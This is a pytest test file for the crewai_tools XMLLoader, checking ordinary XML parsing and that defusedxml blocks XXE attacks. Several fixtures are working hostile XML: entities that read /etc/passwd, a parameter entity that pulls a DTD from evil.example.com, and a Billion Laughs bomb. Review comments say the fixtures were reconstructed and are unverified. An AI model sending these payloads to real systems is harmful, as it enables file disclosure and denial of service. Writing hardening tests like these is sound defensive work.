import os
import tempfile
from unittest.mock import patch
from crewai_tools.rag.base_loader import LoaderResult
from crewai_tools.rag.loaders.xml_loader import XMLLoader
from crewai_tools.rag.source_content import SourceContent
import pytest
class TestXMLLoader:
    """Tests for ``XMLLoader``: parsing, fallback behaviour and XXE hardening.

    NOTE(review): the XML fixtures in this class were restored after their
    markup had been stripped from the file. Element names and entity URLs
    were chosen to satisfy each test's assertions (root tag ``root``, the
    expected text nodes, the ``/etc/passwd`` entity) -- confirm them against
    version control before relying on the exact payloads.
    """

    def test_parse_valid_xml_string(self) -> None:
        """A well-formed XML string yields its text and XML metadata."""
        loader = XMLLoader()
        source = SourceContent("<root><item>Hello</item><item>World</item></root>")

        result = loader.load(source)

        assert isinstance(result, LoaderResult)
        assert "Hello" in result.content
        assert "World" in result.content
        assert result.metadata["format"] == "xml"
        assert result.metadata["root_tag"] == "root"

    def test_parse_xml_from_file(self) -> None:
        """XML stored in a file on disk is loaded and parsed via its path."""
        xml_content = "<root><title>Test Title</title><body>Test Body</body></root>"

        # delete=False so the file outlives the ``with`` block and can be
        # reopened by the loader; it is removed explicitly in ``finally``.
        with tempfile.NamedTemporaryFile(
            mode="w", suffix=".xml", delete=False, encoding="utf-8"
        ) as f:
            f.write(xml_content)
            temp_path = f.name

        try:
            loader = XMLLoader()
            source = SourceContent(temp_path)

            result = loader.load(source)

            assert isinstance(result, LoaderResult)
            assert "Test Title" in result.content
            assert "Test Body" in result.content
            assert result.metadata["format"] == "xml"
            assert result.metadata["root_tag"] == "root"
        finally:
            os.unlink(temp_path)

    def test_parse_invalid_xml_returns_raw_content(self) -> None:
        """Malformed XML is returned verbatim with a ``parse_error`` entry."""
        loader = XMLLoader()
        # Unclosed elements: not well-formed, so parsing must fail.
        invalid_xml = "<root><unclosed>"
        source = SourceContent(invalid_xml)

        result = loader.load(source)

        assert isinstance(result, LoaderResult)
        assert result.content == invalid_xml
        assert "parse_error" in result.metadata
        assert result.metadata["format"] == "xml"

    def test_parse_nested_xml(self) -> None:
        """Text is collected from nested elements as well as direct children."""
        loader = XMLLoader()
        xml = (
            "<root>"
            "<parent><child>Nested text</child></parent>"
            "<sibling>Other text</sibling>"
            "</root>"
        )
        source = SourceContent(xml)

        result = loader.load(source)

        assert "Nested text" in result.content
        assert "Other text" in result.content

    def test_parse_xml_with_attributes(self) -> None:
        """Attributes on elements do not prevent their text being extracted."""
        loader = XMLLoader()
        xml = '<root><item id="1">First</item><item id="2">Second</item></root>'
        source = SourceContent(xml)

        result = loader.load(source)

        assert "First" in result.content
        assert "Second" in result.content
        assert result.metadata["root_tag"] == "root"

    def test_parse_empty_xml_elements(self) -> None:
        """Empty elements are tolerated alongside elements that carry text."""
        loader = XMLLoader()
        xml = "<root><empty/><filled>Content</filled></root>"
        source = SourceContent(xml)

        result = loader.load(source)

        assert "Content" in result.content
        assert result.metadata["format"] == "xml"

    def test_doc_id_consistency(self) -> None:
        """Loading the same source twice produces the same ``doc_id``."""
        loader = XMLLoader()
        xml = "<root><item>Consistent</item></root>"
        source = SourceContent(xml)

        result1 = loader.load(source)
        result2 = loader.load(source)

        assert result1.doc_id == result2.doc_id

    @patch("crewai_tools.rag.loaders.xml_loader.load_from_url")
    def test_load_from_url(self, mock_load_url) -> None:
        """A URL source is fetched through ``load_from_url`` and then parsed."""
        # The network fetch is replaced by the mock, which supplies the XML.
        mock_load_url.return_value = "<root><item>URL content</item></root>"
        loader = XMLLoader()
        source = SourceContent("https://example.com/data.xml")

        result = loader.load(source)

        assert isinstance(result, LoaderResult)
        assert "URL content" in result.content
        mock_load_url.assert_called_once()

    def test_xxe_entity_expansion_blocked(self) -> None:
        """Test that XML External Entity (XXE) attacks are blocked by defusedxml."""
        loader = XMLLoader()
        xxe_payload = (
            '<?xml version="1.0"?>'
            "<!DOCTYPE foo ["
            '  <!ENTITY xxe SYSTEM "file:///etc/passwd">'
            "]>"
            "<root>&xxe;</root>"
        )
        source = SourceContent(xxe_payload)

        result = loader.load(source)

        # defusedxml rejects the entity declaration instead of expanding it.
        # The loader is expected to handle that failure by returning the raw
        # content with a "parse_error" entry in the metadata.
        # NOTE(review): defusedxml's EntitiesForbidden derives from
        # ValueError, not ParseError -- confirm the loader's except clause
        # covers it.
        assert "parse_error" in result.metadata
        assert result.metadata["format"] == "xml"
        # The entity must not have been resolved. The raw payload itself
        # mentions /etc/passwd, so an unchanged payload is also acceptable.
        assert "/etc/passwd" not in result.content or result.content == xxe_payload

    def test_xxe_billion_laughs_blocked(self) -> None:
        """Test that XML bomb (Billion Laughs) attacks are blocked by defusedxml."""
        loader = XMLLoader()
        billion_laughs = (
            '<?xml version="1.0"?>'
            "<!DOCTYPE lolz ["
            '  <!ENTITY lol "lol">'
            '  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">'
            '  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">'
            "]>"
            "<root>&lol3;</root>"
        )
        source = SourceContent(billion_laughs)

        result = loader.load(source)

        # Entity declarations are refused, so the loader reports a parse error.
        assert "parse_error" in result.metadata
        assert result.metadata["format"] == "xml"

    def test_xxe_parameter_entity_blocked(self) -> None:
        """Test that parameter entity attacks are blocked by defusedxml."""
        loader = XMLLoader()
        xxe_param = (
            '<?xml version="1.0"?>'
            "<!DOCTYPE foo ["
            '  <!ENTITY % xxe SYSTEM "http://evil.example.com/xxe.dtd">'
            "  %xxe;"
            "]>"
            "<root>test</root>"
        )
        source = SourceContent(xxe_param)

        result = loader.load(source)

        assert "parse_error" in result.metadata

    def test_xxe_file_from_file_blocked(self) -> None:
        """Test that XXE attacks via file loading are also blocked."""
        xxe_content = (
            '<?xml version="1.0"?>'
            "<!DOCTYPE foo ["
            '  <!ENTITY xxe SYSTEM "file:///etc/passwd">'
            "]>"
            "<root>&xxe;</root>"
        )

        # delete=False so the loader can reopen the file by path; cleanup
        # happens in ``finally``.
        with tempfile.NamedTemporaryFile(
            mode="w", suffix=".xml", delete=False, encoding="utf-8"
        ) as f:
            f.write(xxe_content)
            temp_path = f.name

        try:
            loader = XMLLoader()
            source = SourceContent(temp_path)

            result = loader.load(source)

            assert "parse_error" in result.metadata
            assert result.metadata["format"] == "xml"
        finally:
            os.unlink(temp_path)

    def test_defusedxml_is_used_not_stdlib(self) -> None:
        """Verify that the XMLLoader imports from defusedxml, not xml.etree.ElementTree."""
        import crewai_tools.rag.loaders.xml_loader as xml_loader_module

        # The module-level ``fromstring`` must be the one defined by defusedxml.
        assert "defusedxml" in xml_loader_module.fromstring.__module__

    def test_arxiv_tool_uses_defusedxml(self) -> None:
        """Verify that ArxivPaperTool imports from defusedxml, not xml.etree.ElementTree."""
        import crewai_tools.tools.arxiv_paper_tool.arxiv_paper_tool as arxiv_module

        # ``ET`` is the module alias the tool parses with; its module name
        # reveals which implementation it is bound to.
        ET = arxiv_module.ET
        assert "defusedxml" in ET.__name__